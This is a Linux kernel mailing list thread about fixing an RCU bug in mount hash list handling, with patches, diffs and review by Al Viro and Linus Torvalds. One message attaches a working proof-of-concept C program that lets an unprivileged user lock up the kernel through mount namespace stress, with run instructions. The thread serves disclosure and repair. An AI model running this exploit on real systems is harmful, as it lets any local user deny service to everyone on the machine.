* [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
@ 2014-03-19 21:22 Max Kellermann
2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann
` (2 more replies)
0 siblings, 3 replies; 9+ messages in thread
From: Max Kellermann @ 2014-03-19 21:22 UTC (permalink / raw)
To: viro; +Cc: max, linux-kernel
mount.mnt_hash is RCU-protected. However, list_move() breaks RCU
protection: when one thread walks the linked list while another calls
list_move(), it may "redirect" the first thread into the new list,
making it loop endlessly in __lookup_mnt(), because the list head is
never found.
The right way to delete items from a RCU-protected list is
list_del_rcu(). Before the item is inserted into another list
(completing the list_move), synchronize_rcu() must be called.
umount_tree() has code to implement this kind of protection; it moves
the "mount" object to the global list "unmounted", to be cleaned up by
namespace_unlock() after a synchronize_rcu() call. This however did
not work because umount_tree() reused the "mnt_hash" attribute for the
"unmounted" list.
In the presence of user+mount namespaces, this bug can be exploited by
any unprivileged user to stall the kernel (denial of service by soft
lockup).
The fix is to avoid reusing "mnt_hash". This patch adds a new
list_head attribute dedicated for umounting. This avoids clobbering
mnt_hash.next, allowing all rcu_locked threads to continue walk the
list until namespace_unlock() is called.
This regression was caused by commit 48a066e7 ("RCU'd vfsmounts").
All releases since 3.12-rc5 are affected.
Signed-off-by: Max Kellermann <mk@cm4all.com>
---
fs/mount.h | 1 +
fs/namespace.c | 12 +++++++-----
fs/pnode.c | 8 +++++---
3 files changed, 13 insertions(+), 8 deletions(-)
diff --git a/fs/mount.h b/fs/mount.h
index a17458c..9cfdf94 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -36,6 +36,7 @@ struct mount {
int mnt_count;
int mnt_writers;
#endif
+ struct list_head mnt_unmounted; /* list of mounts being unmounted */
struct list_head mnt_mounts; /* list of children, anchored here */
struct list_head mnt_child; /* and going through their mnt_child */
struct list_head mnt_instance; /* mount instance on sb->s_mounts */
diff --git a/fs/namespace.c b/fs/namespace.c
index 338ccc2..2aa0a14 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -1171,8 +1171,8 @@ static void namespace_unlock(void)
synchronize_rcu();
while (!list_empty(&head)) {
- mnt = list_first_entry(&head, struct mount, mnt_hash);
- list_del_init(&mnt->mnt_hash);
+ mnt = list_first_entry(&head, struct mount, mnt_unmounted);
+ list_del_init(&mnt->mnt_unmounted);
if (mnt->mnt_ex_mountpoint.mnt)
path_put(&mnt->mnt_ex_mountpoint);
mntput(&mnt->mnt);
@@ -1196,13 +1196,15 @@ void umount_tree(struct mount *mnt, int how)
LIST_HEAD(tmp_list);
struct mount *p;
- for (p = mnt; p; p = next_mnt(p, mnt))
- list_move(&p->mnt_hash, &tmp_list);
+ for (p = mnt; p; p = next_mnt(p, mnt)) {
+ list_del_rcu(&p->mnt_hash);
+ list_add(&p->mnt_unmounted, &tmp_list);
+ }
if (how)
propagate_umount(&tmp_list);
- list_for_each_entry(p, &tmp_list, mnt_hash) {
+ list_for_each_entry(p, &tmp_list, mnt_unmounted) {
list_del_init(&p->mnt_expire);
list_del_init(&p->mnt_list);
__touch_mnt_namespace(p->mnt_ns);
diff --git a/fs/pnode.c b/fs/pnode.c
index c7221bb..4bca573 100644
--- a/fs/pnode.c
+++ b/fs/pnode.c
@@ -338,8 +338,10 @@ static void __propagate_umount(struct mount *mnt)
* umount the child only if the child has no
* other children
*/
- if (child && list_empty(&child->mnt_mounts))
- list_move_tail(&child->mnt_hash, &mnt->mnt_hash);
+ if (child && list_empty(&child->mnt_mounts)) {
+ list_del_rcu(&child->mnt_hash);
+ list_add(&child->mnt_unmounted, &mnt->mnt_hash);
+ }
}
}
@@ -354,7 +356,7 @@ int propagate_umount(struct list_head *list)
{
struct mount *mnt;
- list_for_each_entry(mnt, list, mnt_hash)
+ list_for_each_entry(mnt, list, mnt_unmounted)
__propagate_umount(mnt);
return 0;
}
^ permalink raw reply related [flat|nested] 9+ messages in thread
* [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash
2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
@ 2014-03-19 21:22 ` Max Kellermann
2014-03-19 21:24 ` [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
2014-03-19 21:37 ` Max Kellermann
2 siblings, 0 replies; 9+ messages in thread
From: Max Kellermann @ 2014-03-19 21:22 UTC (permalink / raw)
To: viro; +Cc: max, linux-kernel
mount.mnt_hash is RCU-protected, and therefore we must use the RCU
variants to manipulate the list.
Signed-off-by: Max Kellermann <mk@cm4all.com>
---
fs/namespace.c | 9 +++++----
1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/fs/namespace.c b/fs/namespace.c
index 2aa0a14..295a0c0 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -22,6 +22,7 @@
#include <linux/fsnotify.h> /* fsnotify_vfsmount_delete */
#include <linux/uaccess.h>
#include <linux/proc_ns.h>
+#include <linux/rculist.h>
#include <linux/magic.h>
#include "pnode.h"
#include "internal.h"
@@ -739,8 +740,8 @@ static void attach_mnt(struct mount *mnt,
struct mountpoint *mp)
{
mnt_set_mountpoint(parent, mp, mnt);
- list_add_tail(&mnt->mnt_hash, mount_hashtable +
- hash(&parent->mnt, mp->m_dentry));
+ list_add_tail_rcu(&mnt->mnt_hash, mount_hashtable +
+ hash(&parent->mnt, mp->m_dentry));
list_add_tail(&mnt->mnt_child, &parent->mnt_mounts);
}
@@ -762,8 +763,8 @@ static void commit_tree(struct mount *mnt)
list_splice(&head, n->list.prev);
- list_add_tail(&mnt->mnt_hash, mount_hashtable +
- hash(&parent->mnt, mnt->mnt_mountpoint));
+ list_add_tail_rcu(&mnt->mnt_hash, mount_hashtable +
+ hash(&parent->mnt, mnt->mnt_mountpoint));
list_add_tail(&mnt->mnt_child, &parent->mnt_mounts);
touch_mnt_namespace(n);
}
^ permalink raw reply related [flat|nested] 9+ messages in thread
* Re: [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann
@ 2014-03-19 21:24 ` Max Kellermann
2014-03-19 21:37 ` Max Kellermann
2 siblings, 0 replies; 9+ messages in thread
From: Max Kellermann @ 2014-03-19 21:24 UTC (permalink / raw)
To: viro, linux-kernel
[-- Attachment #1: Type: text/plain, Size: 250 bytes --]
On 2014/03/19 22:22, Max Kellermann <mk@cm4all.com> wrote:
> In the presence of user+mount namespaces, this bug can be exploited by
> any unprivileged user to stall the kernel (denial of service by soft
> lockup).
Proof-of-concept exploit attached.
[-- Attachment #2: rcumount.c --]
[-- Type: text/x-csrc, Size: 1878 bytes --]
/*
* Exploit for linux commit 48a066e72d970a3e225a9c18690d570c736fc455:
* endless loop in __lookup_mnt() because the mount_hashtable does not
* have enough RCU protection.
*
* How to use:
*
* gcc -D_GNU_SOURCE -std=gnu99 -o rcumount rcumount.c && ./rcumount
*
* Wait a few minutes until "rcu_sched self-detected stall" appears.
* The machine is now unusable.
*
* Author: Max Kellermann <max@duempel.org>
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sched.h>
#include <sys/mount.h>
#include <sys/stat.h>
static void stress(void) {
/* make all mounts private so our namespace "owns" them */
mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL);
while (1) {
/* stress the mount_hashtable which will at some point modify
a list_head which is rcu-protected but still referenced by
another kernel thread; this may or may not lead this other
kernel thread into an endless loop inside __lookup_mnt()
never sees the head again */
if (mount("none", "/tmp", "tmpfs", 0, "size=16M,nr_inodes=256") == 0)
umount2("/tmp", MNT_DETACH);
/* ask the kernel to walk the mount hash, which may trigger
the __lookup_mnt() */
struct stat st;
stat("/tmp/..", &st);
}
}
static int fn(void *arg) {
(void)arg;
/* launch child processes */
for (unsigned i = 0; i < 32; ++i) {
if (fork() == 0) {
stress();
exit(0);
}
}
/* cleanup */
int status;
do {} while(wait(&status) > 0);
return 0;
}
int main(int argc, char **argv) {
/* create a new user+vfs namespace which allows us to mount() */
char stack[65536];
clone(fn, stack + sizeof(stack), SIGCHLD|CLONE_NEWNS|CLONE_NEWUSER, NULL);
/* cleanup */
int status; wait(&status);
}
^ permalink raw reply [flat|nested] 9+ messages in thread
* Re: [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann
2014-03-19 21:24 ` [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
@ 2014-03-19 21:37 ` Max Kellermann
2014-03-19 21:39 ` [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] Max Kellermann
2 siblings, 1 reply; 9+ messages in thread
From: Max Kellermann @ 2014-03-19 21:37 UTC (permalink / raw)
To: viro; +Cc: linux-kernel
On 2014/03/19 22:22, Max Kellermann <mk@cm4all.com> wrote:
> + list_add(&child->mnt_unmounted, &mnt->mnt_hash);
This is obviously a bug in my patch, sorry. Will resend a fixed
patch.
^ permalink raw reply [flat|nested] 9+ messages in thread
* [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
2014-03-19 21:37 ` Max Kellermann
@ 2014-03-19 21:39 ` Max Kellermann
2014-03-20 3:48 ` Al Viro
0 siblings, 1 reply; 9+ messages in thread
From: Max Kellermann @ 2014-03-19 21:39 UTC (permalink / raw)
To: viro; +Cc: max, linux-kernel
mount.mnt_hash is RCU-protected. However, list_move() breaks RCU
protection: when one thread walks the linked list while another calls
list_move(), it may "redirect" the first thread into the new list,
making it loop endlessly in __lookup_mnt(), because the list head is
never found.
The right way to delete items from a RCU-protected list is
list_del_rcu(). Before the item is inserted into another list
(completing the list_move), synchronize_rcu() must be called.
umount_tree() has code to implement this kind of protection; it moves
the "mount" object to the global list "unmounted", to be cleaned up by
namespace_unlock() after a synchronize_rcu() call. This however did
not work because umount_tree() reused the "mnt_hash" attribute for the
"unmounted" list.
In the presence of user+mount namespaces, this bug can be exploited by
any unprivileged user to stall the kernel (denial of service by soft
lockup).
The fix is to avoid reusing "mnt_hash". This patch adds a new
list_head attribute dedicated for umounting. This avoids clobbering
mnt_hash.next, allowing all rcu_locked threads to continue walk the
list until namespace_unlock() is called.
This regression was caused by commit 48a066e7 ("RCU'd vfsmounts").
All releases since 3.12-rc5 are affected.
Signed-off-by: Max Kellermann <mk@cm4all.com>
---
fs/mount.h | 1 +
fs/namespace.c | 12 +++++++-----
fs/pnode.c | 8 +++++---
3 files changed, 13 insertions(+), 8 deletions(-)
diff --git a/fs/mount.h b/fs/mount.h
index a17458c..9cfdf94 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -36,6 +36,7 @@ struct mount {
int mnt_count;
int mnt_writers;
#endif
+ struct list_head mnt_unmounted; /* list of mounts being unmounted */
struct list_head mnt_mounts; /* list of children, anchored here */
struct list_head mnt_child; /* and going through their mnt_child */
struct list_head mnt_instance; /* mount instance on sb->s_mounts */
diff --git a/fs/namespace.c b/fs/namespace.c
index 338ccc2..2aa0a14 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -1171,8 +1171,8 @@ static void namespace_unlock(void)
synchronize_rcu();
while (!list_empty(&head)) {
- mnt = list_first_entry(&head, struct mount, mnt_hash);
- list_del_init(&mnt->mnt_hash);
+ mnt = list_first_entry(&head, struct mount, mnt_unmounted);
+ list_del_init(&mnt->mnt_unmounted);
if (mnt->mnt_ex_mountpoint.mnt)
path_put(&mnt->mnt_ex_mountpoint);
mntput(&mnt->mnt);
@@ -1196,13 +1196,15 @@ void umount_tree(struct mount *mnt, int how)
LIST_HEAD(tmp_list);
struct mount *p;
- for (p = mnt; p; p = next_mnt(p, mnt))
- list_move(&p->mnt_hash, &tmp_list);
+ for (p = mnt; p; p = next_mnt(p, mnt)) {
+ list_del_rcu(&p->mnt_hash);
+ list_add(&p->mnt_unmounted, &tmp_list);
+ }
if (how)
propagate_umount(&tmp_list);
- list_for_each_entry(p, &tmp_list, mnt_hash) {
+ list_for_each_entry(p, &tmp_list, mnt_unmounted) {
list_del_init(&p->mnt_expire);
list_del_init(&p->mnt_list);
__touch_mnt_namespace(p->mnt_ns);
diff --git a/fs/pnode.c b/fs/pnode.c
index c7221bb..c16c5d64 100644
--- a/fs/pnode.c
+++ b/fs/pnode.c
@@ -338,8 +338,10 @@ static void __propagate_umount(struct mount *mnt)
* umount the child only if the child has no
* other children
*/
- if (child && list_empty(&child->mnt_mounts))
- list_move_tail(&child->mnt_hash, &mnt->mnt_hash);
+ if (child && list_empty(&child->mnt_mounts)) {
+ list_del_rcu(&child->mnt_hash);
+ list_add(&child->mnt_unmounted, &mnt->mnt_unmounted);
+ }
}
}
@@ -354,7 +356,7 @@ int propagate_umount(struct list_head *list)
{
struct mount *mnt;
- list_for_each_entry(mnt, list, mnt_hash)
+ list_for_each_entry(mnt, list, mnt_unmounted)
__propagate_umount(mnt);
return 0;
}
^ permalink raw reply related [flat|nested] 9+ messages in thread
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
2014-03-19 21:39 ` [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] Max Kellermann
@ 2014-03-20 3:48 ` Al Viro
2014-03-20 4:02 ` Linus Torvalds
0 siblings, 1 reply; 9+ messages in thread
From: Al Viro @ 2014-03-20 3:48 UTC (permalink / raw)
To: Max Kellermann; +Cc: max, linux-kernel, Linus Torvalds
On Wed, Mar 19, 2014 at 10:39:45PM +0100, Max Kellermann wrote:
> mount.mnt_hash is RCU-protected. However, list_move() breaks RCU
> protection: when one thread walks the linked list while another calls
> list_move(), it may "redirect" the first thread into the new list,
> making it loop endlessly in __lookup_mnt(), because the list head is
> never found.
> The right way to delete items from a RCU-protected list is
> list_del_rcu(). Before the item is inserted into another list
> (completing the list_move), synchronize_rcu() must be called.
> The fix is to avoid reusing "mnt_hash". This patch adds a new
> list_head attribute dedicated for umounting. This avoids clobbering
> mnt_hash.next, allowing all rcu_locked threads to continue walk the
> list until namespace_unlock() is called.
NAK. Nice catch, the bug is real, but the fix is wrong. For one thing,
you have missed detach_mnt()/attach_mnt(), so you are not covering
all places where the sucker might be removed from the list. For another,
I don't believe that this is the right approach.
The *only* thing we care about is not getting stuck in __lookup_mnt(). If
it misses an entry because something in front of it just got moved around,
etc., we are fine. We'll notice that mount_lock mismatch and that'll be
it.
IOW, there are two problems here:
(1) we can, indeed, get caught into an infinite loop.
(2) __follow_mount_rcu() and follow_mount_rcu() ought to recheck
nd->m_seq and bugger off with ECHILD in case of mismatch (the latter probably
ought to be folded into follow_dotdot_rcu()). legitimize_mnt() will fail
in the end of lookup *and* we are risking an incorrect hard error if we fail
to cross a mountpoint and continue under it.
I would prefer to deal with (1) by turning mnt_hash into hlist; the problem
with that is __lookup_mnt_last(). That sucker is only called under
mount_lock, so RCU issues do not play there, but it's there and it
complicates things. There might be a way to get rid of that thing for
good, but that's more invasive than what I'd be happy with for backports.
Let's just have __lookup_mnt() recheck mount_lock if it goes for too long -
e.g. every 256 iterations (and if the hash chain is that long, the price
of extra smp_rmb() + fetching seqcount won't matter anyway). And have the
fs/namei.c callers check nd->m_seq properly (lookup_mnt() already does).
I've looked into taking the check into __lookup_mnt() itself, but it
leads to clumsier calling conventions and worse code in callers.
How about the following (completely untested yet):
diff --git a/fs/mount.h b/fs/mount.h
index 46790ae1..905d1bc 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -77,7 +77,7 @@ static inline int is_mounted(struct vfsmount *mnt)
return !IS_ERR_OR_NULL(real_mount(mnt)->mnt_ns);
}
-extern struct mount *__lookup_mnt(struct vfsmount *, struct dentry *);
+extern struct mount *__lookup_mnt(struct vfsmount *, struct dentry *, unsigned seq);
extern struct mount *__lookup_mnt_last(struct vfsmount *, struct dentry *);
extern bool legitimize_mnt(struct vfsmount *, unsigned);
diff --git a/fs/namei.c b/fs/namei.c
index d6e32a1..458572b 100644
--- a/fs/namei.c
+++ b/fs/namei.c
@@ -1115,7 +1115,7 @@ static bool __follow_mount_rcu(struct nameidata *nd, struct path *path,
if (!d_mountpoint(path->dentry))
break;
- mounted = __lookup_mnt(path->mnt, path->dentry);
+ mounted = __lookup_mnt(path->mnt, path->dentry, nd->m_seq);
if (!mounted)
break;
path->mnt = &mounted->mnt;
@@ -1129,20 +1129,7 @@ static bool __follow_mount_rcu(struct nameidata *nd, struct path *path,
*/
*inode = path->dentry->d_inode;
}
- return true;
-}
-
-static void follow_mount_rcu(struct nameidata *nd)
-{
- while (d_mountpoint(nd->path.dentry)) {
- struct mount *mounted;
- mounted = __lookup_mnt(nd->path.mnt, nd->path.dentry);
- if (!mounted)
- break;
- nd->path.mnt = &mounted->mnt;
- nd->path.dentry = mounted->mnt.mnt_root;
- nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
- }
+ return read_seqretry(&mount_lock, nd->m_seq);
}
static int follow_dotdot_rcu(struct nameidata *nd)
@@ -1170,7 +1157,17 @@ static int follow_dotdot_rcu(struct nameidata *nd)
break;
nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
}
- follow_mount_rcu(nd);
+ while (d_mountpoint(nd->path.dentry)) {
+ struct mount *mounted;
+ mounted = __lookup_mnt(nd->path.mnt, nd->path.dentry, nd->m_seq);
+ if (!mounted)
+ break;
+ nd->path.mnt = &mounted->mnt;
+ nd->path.dentry = mounted->mnt.mnt_root;
+ nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
+ if (!read_seqretry(&mount_lock, nd->m_seq))
+ goto failed;
+ }
nd->inode = nd->path.dentry->d_inode;
return 0;
diff --git a/fs/namespace.c b/fs/namespace.c
index 203475b..72c20b0 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -599,16 +599,23 @@ bool legitimize_mnt(struct vfsmount *bastard, unsigned seq)
/*
* find the first mount at @dentry on vfsmount @mnt.
- * call under rcu_read_lock()
+ * call under rcu_read_lock(). seq is normally *not* checked - that's
+ * for the caller to deal with; here we are just breaking infinite loops.
+ * If we get hash chains longer than 256 elements, the price of extra
+ * smp_rmb() won't matter.
*/
-struct mount *__lookup_mnt(struct vfsmount *mnt, struct dentry *dentry)
+struct mount *__lookup_mnt(struct vfsmount *mnt, struct dentry *dentry, unsigned seq)
{
struct list_head *head = m_hash(mnt, dentry);
struct mount *p;
+ unsigned char n = 0;
- list_for_each_entry_rcu(p, head, mnt_hash)
+ list_for_each_entry_rcu(p, head, mnt_hash) {
+ if (unlikely(!--n) && !read_seqretry(&mount_lock, seq))
+ break;
if (&p->mnt_parent->mnt == mnt && p->mnt_mountpoint == dentry)
return p;
+ }
return NULL;
}
@@ -652,7 +659,7 @@ struct vfsmount *lookup_mnt(struct path *path)
rcu_read_lock();
do {
seq = read_seqbegin(&mount_lock);
- child_mnt = __lookup_mnt(path->mnt, path->dentry);
+ child_mnt = __lookup_mnt(path->mnt, path->dentry, seq);
m = child_mnt ? &child_mnt->mnt : NULL;
} while (!legitimize_mnt(m, seq));
rcu_read_unlock();
^ permalink raw reply related [flat|nested] 9+ messages in thread
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
2014-03-20 3:48 ` Al Viro
@ 2014-03-20 4:02 ` Linus Torvalds
2014-03-20 4:21 ` Al Viro
0 siblings, 1 reply; 9+ messages in thread
From: Linus Torvalds @ 2014-03-20 4:02 UTC (permalink / raw)
To: Al Viro; +Cc: Max Kellermann, max, Linux Kernel Mailing List
On Wed, Mar 19, 2014 at 8:48 PM, Al Viro <viro@zeniv.linux.org.uk> wrote:
>
> NAK. Nice catch, the bug is real, but the fix is wrong. For one thing,
> you have missed detach_mnt()/attach_mnt(), so you are not covering
> all places where the sucker might be removed from the list. For another,
> I don't believe that this is the right approach.
>
> The *only* thing we care about is not getting stuck in __lookup_mnt().
Quite frankly, if that's the main issue, then may I suggest aiming to
use a 'hlist' instead of a doubly-linked list? Those have the
advantage that they are NULL-terminated.
Yeah, hlists have some disadvantages too, which might not make them
work in this case, but really, for mnt_hash? hlists are generally
*exactly* what you want for hash lists, because the head is smaller.
And because of the NULL termination rather than having the head used
in the middle of a circular list, you don't get the termination
problems when moving entries across chains.
I did not look whether there was some reason a hlist isn't appropriate
here. Maybe you can tell me. Or go "yeah, a hlist would work nicely".
Linus
^ permalink raw reply [flat|nested] 9+ messages in thread
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
2014-03-20 4:02 ` Linus Torvalds
@ 2014-03-20 4:21 ` Al Viro
2014-03-20 4:58 ` Linus Torvalds
0 siblings, 1 reply; 9+ messages in thread
From: Al Viro @ 2014-03-20 4:21 UTC (permalink / raw)
To: Linus Torvalds; +Cc: Max Kellermann, max, Linux Kernel Mailing List
On Wed, Mar 19, 2014 at 09:02:33PM -0700, Linus Torvalds wrote:
> Quite frankly, if that's the main issue, then may I suggest aiming to
> use a 'hlist' instead of a doubly-linked list? Those have the
> advantage that they are NULL-terminated.
>
> Yeah, hlists have some disadvantages too, which might not make them
> work in this case, but really, for mnt_hash? hlists are generally
> *exactly* what you want for hash lists, because the head is smaller.
> And because of the NULL termination rather than having the head used
> in the middle of a circular list, you don't get the termination
> problems when moving entries across chains.
>
> I did not look whether there was some reason a hlist isn't appropriate
> here. Maybe you can tell me.
Er... I have, actually, right in the part you've snipped ;-)
<unsnip>
I would prefer to deal with (1) by turning mnt_hash into hlist; the problem
with that is __lookup_mnt_last(). That sucker is only called under
mount_lock, so RCU issues do not play there, but it's there and it
complicates things. There might be a way to get rid of that thing for
good, but that's more invasive than what I'd be happy with for backports.
</unsnip>
hlist _is_ better, no questions there, but surgery required to deal with
__lookup_mnt_last()[1] is too invasive for backports and even more so -
for -final. I would prefer to have the merge window happen after LSF/MM,
obviously, but I thought you wanted to open it this Sunday?
[1] that is, with cases like "/tmp/b is a slave of /tmp/a, bind foo on
/tmp/b/c, then bind bar on /tmp/a/c, then umount /tmp/a/c". The only
kinda-sorta sane semantics we'd been able to come up with is what
we do right now and that's where __lookup_mnt_last() has come from.
^ permalink raw reply [flat|nested] 9+ messages in thread
* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
2014-03-20 4:21 ` Al Viro
@ 2014-03-20 4:58 ` Linus Torvalds
0 siblings, 0 replies; 9+ messages in thread
From: Linus Torvalds @ 2014-03-20 4:58 UTC (permalink / raw)
To: Al Viro; +Cc: Max Kellermann, max, Linux Kernel Mailing List
On Wed, Mar 19, 2014 at 9:21 PM, Al Viro <viro@zeniv.linux.org.uk> wrote:
>
> Er... I have, actually, right in the part you've snipped ;-)
Heh. That's what I get for just reading the patch, and skimming the explanation.
> I would prefer to deal with (1) by turning mnt_hash into hlist; the problem
> with that is __lookup_mnt_last(). That sucker is only called under
> mount_lock, so RCU issues do not play there, but it's there and it
> complicates things. There might be a way to get rid of that thing for
> good, but that's more invasive than what I'd be happy with for backports.
Yeah. I see what you're saying. That said, if we expect the mnt_hash
queues to be short (and they really should be), that whole
__lookup_mnt_last() could just be
struct mount *p, *result = NULL;
hlist_for_each_entry(p, head, mnt_hash)
if (&p->mnt_parent->mnt == mnt && p->mnt_mountpoint == dentry)
result = p;
return result;
which is certainly simple.
Sure, it always walks the whole list, but as far as I can tell the
callers aren't exactly performance-critical, and we're talking about a
hlist that should be just a couple of entries in size..
So if that's the _only_ thing holding back using hlists, I'd say we
should just do the above trivial conversion.
Linus
^ permalink raw reply [flat|nested] 9+ messages in thread
end of thread, other threads:[~2014-03-20 4:58 UTC | newest]
Thread overview: 9+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann
2014-03-19 21:24 ` [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
2014-03-19 21:37 ` Max Kellermann
2014-03-19 21:39 ` [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] Max Kellermann
2014-03-20 3:48 ` Al Viro
2014-03-20 4:02 ` Linus Torvalds
2014-03-20 4:21 ` Al Viro
2014-03-20 4:58 ` Linus Torvalds
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox